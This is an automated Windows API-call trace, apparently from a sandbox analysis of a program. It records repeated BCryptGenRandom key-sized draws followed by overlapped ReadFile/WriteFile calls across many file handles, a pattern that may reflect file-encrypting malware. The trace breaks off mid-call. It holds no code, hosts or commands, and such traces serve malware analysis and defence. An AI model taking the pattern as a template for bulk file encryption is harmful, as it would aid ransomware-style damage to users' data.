GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0185.594] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.595] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0185.595] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.595] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.595] free (_Block=0x3e305b8) [0185.595] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.595] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0185.596] free (_Block=0x1fa91d0) [0185.596] free (_Block=0x77d7a8) [0185.596] free (_Block=0x1fa90b8) [0185.596] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0185.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.597] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1653, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0185.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.817] CloseHandle (hObject=0x170) returned 1 [0185.817] free (_Block=0x3df0008) [0185.817] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0185.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0185.825] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.826] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.826] free (_Block=0x3e305b8) [0185.826] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.826] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.826] free (_Block=0x1fa91d0) [0185.826] free (_Block=0x1fa2ed8) [0185.826] free (_Block=0x1fa90b8) [0185.826] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0185.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.833] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x110a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0185.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0185.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.842] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0185.842] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.842] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.842] free (_Block=0x3e305b8) [0185.842] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.842] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.843] free (_Block=0x1fa91d0) [0185.843] free (_Block=0x1fa2ed8) [0185.843] free (_Block=0x1fa90b8) [0185.843] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.844] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.851] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x3f430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0185.852] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0185.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0185.862] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.862] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.862] free (_Block=0x3e305b8) [0185.862] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.862] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.862] free (_Block=0x1fa91d0) [0185.862] free (_Block=0x1fa2ed8) [0185.862] free (_Block=0x1fa90b8) [0185.862] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0185.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.880] CloseHandle (hObject=0x170) returned 1 [0185.881] free (_Block=0x3df0008) [0185.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0185.890] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1763b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0185.899] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0187.508] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x12410, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0187.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0187.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.518] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0187.518] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.187] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0190.188] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.188] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.188] free (_Block=0x3e305b8) [0190.188] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.188] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.189] free (_Block=0x1fa91d0) [0190.189] free (_Block=0x1fa2ed8) [0190.189] free (_Block=0x1fa90b8) [0190.189] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0190.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0190.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0190.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0190.193] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.193] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.193] free (_Block=0x3e305b8) [0190.193] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.193] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.194] free (_Block=0x1fa91d0) [0190.194] free (_Block=0x1fa2ed8) [0190.194] free (_Block=0x1fa90b8) [0190.194] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0190.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0190.196] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x10600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0190.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0190.666] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xd15a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0190.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0190.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0190.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.675] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0190.675] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.675] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.675] free (_Block=0x3e305b8) [0190.675] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.675] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.676] free (_Block=0x1fa91d0) [0190.676] free (_Block=0x1fa2ed8) [0190.676] free (_Block=0x1fa90b8) [0190.676] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0190.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0190.699] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x106e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0190.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0206.037] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.038] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0206.038] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.038] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0206.039] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.039] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.039] free (_Block=0x3e305b8) [0206.039] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.039] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0206.040] free (_Block=0x1fa91d0) [0206.040] free (_Block=0x77d7a8) [0206.040] free (_Block=0x1fa90b8) [0206.040] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0206.040] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0206.042] CloseHandle (hObject=0x308) returned 1 [0206.074] free (_Block=0x3d70450) [0206.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.729] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.729] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.741] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0209.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.752] CloseHandle (hObject=0x338) returned 1 [0209.752] free (_Block=0x3f70048) [0209.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.762] CloseHandle (hObject=0xec) returned 1 [0209.762] free (_Block=0x3e70008) [0209.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.767] CloseHandle (hObject=0x3cc) returned 1 [0209.767] free (_Block=0x3ef0008) [0209.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.767] CloseHandle (hObject=0x238) returned 1 [0209.767] free (_Block=0x3fb00b8) [0209.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.768] CloseHandle (hObject=0x170) returned 1 [0209.768] free (_Block=0x3df0008) [0209.768] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0209.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.906] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0209.906] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.906] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.906] free (_Block=0x3e305b8) [0209.906] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.906] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.907] free (_Block=0x1fa91d0) [0209.907] free (_Block=0x1fa2ed8) [0209.907] free (_Block=0x1fa90b8) [0209.907] WriteFile (in: hFile=0xec, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0209.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.907] WriteFile (in: hFile=0xec, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0209.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.947] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.950] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.950] CloseHandle (hObject=0xec) returned 1 [0209.950] free (_Block=0x1ff1e60) [0209.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0209.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0209.956] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.956] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.956] free (_Block=0x3e305b8) [0209.957] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.957] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.957] free (_Block=0x1fa91d0) [0209.957] free (_Block=0x1fa2ed8) [0209.957] free (_Block=0x1fa90b8) [0209.957] WriteFile (in: hFile=0x238, 